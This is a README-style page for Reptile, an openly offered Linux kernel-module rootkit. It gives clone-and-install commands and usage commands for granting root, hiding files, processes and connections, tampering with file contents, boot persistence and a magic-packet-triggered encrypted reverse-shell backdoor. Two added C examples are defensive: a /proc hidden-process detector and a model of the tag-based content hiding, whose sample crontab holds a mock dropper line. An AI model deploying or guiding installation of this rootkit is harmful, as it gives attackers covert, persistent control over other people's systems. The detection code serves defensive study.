Reptile: LKM Linux rootkit

Tested on

Debian 9: 4.9.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
CentOS 7: 3.10.0-862.3.2.el7.x86_64
CentOS 6.10: 2.6.32-754.6.3.el6.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide itself
  • Hide TCP/IP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connects back at a configurable interval (not enabled by default)

Install

apt-get install linux-headers-$(uname -r)
perl -MCPAN -e "install String::Unescape"
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install

Uninstall

./setup.sh remove

Usage

Give root to unprivileged users

To get root privileges just type: /reptile/reptile_cmd root

Hide files, directories and kernel module

All files and directories that have reptile in their name are hidden. You can change this string in the installation script. The following commands hide/unhide the files, directories and kernel module (processes take a PID argument, see below).

To hide: /reptile/reptile_cmd hide 
To unhide: /reptile/reptile_cmd show

Hide processes

To hide processes: /reptile/reptile_cmd hide <pid> 
To unhide processes: /reptile/reptile_cmd show <pid>
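Hiding a process from /proc listings is what makes it disappear from ps and top. One check a practitioner can run for this class of hiding, written here as an added example rather than Reptile's own code, compares what readdir() on /proc reports with what a direct stat() of /proc/<pid> reaches, and filters out threads (which are reachable by path without ever being listed). Whether Reptile's hooks also cover path lookup is not something this README states, so treat it as a generic check, not a Reptile detector; the same readdir-versus-lookup comparison applies to hidden files. The pid_max bound in main() is an assumption to tighten from /proc/sys/kernel/pid_max.

```c
/* Added example (not Reptile's own code): find processes hidden from /proc
 * directory listings.  A rootkit that filters readdir() on /proc makes ps and
 * "ls /proc" lose the PID, but stat("/proc/<pid>") goes through path lookup,
 * not readdir, and often still succeeds; comparing the two views exposes the
 * gap.  Caveats: a rootkit that also hooks lookup evades this, so "nothing
 * found" is not "clean", and threads are reachable as /proc/<tid> without
 * being listed, so candidates are filtered on Tgid.  Build: cc -O2 hidden_pids.c */
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Parse a /proc entry name; -1 for non-PID entries such as "self" or "net". */
int parse_pid_name(const char *name)
{
    char *end = NULL;
    long v = (*name >= '1' && *name <= '9') ? strtol(name, &end, 10) : 0;
    return (v > 0 && v <= 0x7fffffff && *end == '\0') ? (int)v : -1;
}

/* Extract the Tgid: value from the text of /proc/<pid>/status; -1 if absent. */
int tgid_from_status(const char *text)
{
    const char *p;
    for (p = text; p && *p; p = strchr(p, '\n') ? strchr(p, '\n') + 1 : NULL)
        if (strncmp(p, "Tgid:", 5) == 0)
            return (int)strtol(p + 5, NULL, 10);
    return -1;
}

/* True when /proc/<pid>/status says Tgid == pid: a process, not a thread. */
static int is_thread_group_leader(int pid)
{
    char path[64], buf[4096]; FILE *f; size_t n;
    snprintf(path, sizeof path, "/proc/%d/status", pid);
    if ((f = fopen(path, "r")) == NULL)
        return 0;
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return tgid_from_status(buf) == pid;
}

/* Mark every PID that a readdir() of /proc reports. */
static void mark_listed(unsigned char *listed, int pid_max)
{
    struct dirent *de;
    DIR *d = opendir("/proc");
    if (!d)
        return;
    while ((de = readdir(d)) != NULL) {
        int pid = parse_pid_name(de->d_name);
        if (pid > 0 && pid <= pid_max)
            listed[pid] = 1;
    }
    closedir(d);
}

/* Probe /proc/1 .. /proc/<pid_max> by path and return how many PIDs stat()
 * reaches but readdir() never listed (listing passes before and after the probe
 * drop processes that started or exited in between).  First `cap` go to `out`. */
int find_hidden_pids(int pid_max, int *out, int cap)
{
    unsigned char *listed = calloc((size_t)pid_max + 1, 1);
    unsigned char *probed = calloc((size_t)pid_max + 1, 1);
    char path[64];
    struct stat st;
    int pid, n = 0;
    if (!listed || !probed) { free(listed); free(probed); return -1; }
    mark_listed(listed, pid_max);
    for (pid = 1; pid <= pid_max; pid++) {
        snprintf(path, sizeof path, "/proc/%d", pid);
        if (stat(path, &st) == 0)
            probed[pid] = 1;
    }
    mark_listed(listed, pid_max);
    for (pid = 1; pid <= pid_max; pid++)
        if (probed[pid] && !listed[pid] && is_thread_group_leader(pid)) {
            if (n < cap)
                out[n] = pid;
            n++;
        }
    free(listed);
    free(probed);
    return n;
}

int main(void)
{
    int hidden[64], n, i, pid_max = 4194304; /* bound; read /proc/sys/kernel/pid_max to tighten */
    n = find_hidden_pids(pid_max, hidden, 64);
    for (i = 0; i < n && i < 64; i++)
        printf("hidden PID candidate: %d\n", hidden[i]);
    printf("%d candidate(s) among %d PIDs\n", n, pid_max);
    return n > 0 ? 1 : (n < 0 ? 2 : 0);
}
```

Exit status 1 means at least one PID is reachable by path but missing from the listing; inspect /proc/<pid>/exe and /proc/<pid>/cmdline for each candidate. A clean run proves only that this particular discrepancy is absent.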

Hide TCP/IP connections

Hide: /reptile/reptile_cmd conn <IP> <port> hide 
Unhide: /reptile/reptile_cmd conn <IP> <port> show

File content tampering

All content between tags will be hidden:

#<reptile> 
content to hide 
#</reptile>

You can configure these tags in the installation script.
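To make the hiding rule concrete, here is a user-space model of that filter as an added example (not Reptile's kernel code): it applies the tag rule to an in-memory buffer the way the module applies it to what read() returns. It assumes the default tag strings above and that everything from the opening tag through the closing tag and its trailing newline is dropped, with an unterminated opening tag hiding the rest of the file; the sample crontab and the dropper path in it are constructed for the example.

```c
/* Added example (not Reptile's own code): a user-space model of the file
 * content tampering above.  Reptile's module filters what read() returns on a
 * file; this applies the same rule to an in-memory buffer so the effect can be
 * seen without loading the module.  Assumed rule: everything from the opening
 * tag through the closing tag and its trailing newline is dropped, and an
 * opening tag with no closing tag hides the rest of the file.  The tags are
 * the README defaults (Reptile lets you change them in the install script).
 * Build: cc -O2 -o tagfilter tagfilter.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OPEN_TAG  "#<reptile>"
#define CLOSE_TAG "#</reptile>"

/* Return a newly allocated copy of `in` with every tagged region removed;
 * the caller frees it.  Returns NULL on allocation failure. */
char *strip_tagged(const char *in)
{
    size_t o = 0;
    const char *p = in;
    char *out = malloc(strlen(in) + 1);   /* output is never longer than input */
    if (!out)
        return NULL;
    while (*p) {
        const char *start = strstr(p, OPEN_TAG);
        const char *end;
        if (!start) {                      /* no more tags: copy the remainder */
            memcpy(out + o, p, strlen(p));
            o += strlen(p);
            break;
        }
        memcpy(out + o, p, (size_t)(start - p));
        o += (size_t)(start - p);
        end = strstr(start + strlen(OPEN_TAG), CLOSE_TAG);
        if (!end)                          /* unterminated: hide to end of file */
            break;
        p = end + strlen(CLOSE_TAG);
        if (*p == '\n')                    /* swallow the line break after the tag */
            p++;
    }
    out[o] = '\0';
    return out;
}

/* Constructed sample: a crontab with a persistence entry wrapped in the tags.
 * The dropper path is made up for the example. */
const char *SAMPLE_CRONTAB =
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/backup.sh\n"
    "#<reptile>\n"
    "@reboot /var/tmp/.dropper.sh\n"
    "#</reptile>\n"
    "30 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf\n";

/* What a reader of the file sees while the module is loaded. */
const char *EXPECTED_VISIBLE =
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/backup.sh\n"
    "30 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf\n";

int main(void)
{
    char *visible = strip_tagged(SAMPLE_CRONTAB);
    int ok;
    if (!visible)
        return 2;
    printf("--- on disk ---\n%s--- as read with the module loaded ---\n%s",
           SAMPLE_CRONTAB, visible);
    ok = strcmp(visible, EXPECTED_VISIBLE) == 0;
    free(visible);
    return ok ? 0 : 1;
}
```

Exit status 0 means the filter produced exactly the expected view. The check this suggests for a live system: a kernel-side filter only affects the live read path, so comparing a file as read on the running host with the same file read from the disk image or rescue media reveals the hidden region.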

Backdoor

The backdoor is a reverse shell triggered by a magic packet sent via TCP, UDP or ICMP protocol.

Client

Compiling:

./setup.sh client

The client is MSF-like and easy to use. Run ./client and type help to see the commands.

There are two other binaries, listener and packet. The client binary drives both, but you can also use them on their own.

Shell

The shell is easy to use; type help to see the commands.

  • It hides its own process and connection.
  • Its connection is encrypted.
  • It has a built-in file uploader and downloader.
  • You can set a delay so that the shell reconnects at an interval of your choosing.
  • Running the shell command gives you a full TTY/PTY shell, like ssh.

You can compile this shell in a standalone version to use without the Kernel Module:

./setup.sh reverse

Because the standalone shell is not triggered by magic packets, you connect to it with listener: compile the client tools with ./setup.sh client and use the listener binary.

Source: https://github.com/f0rb1dd3n/
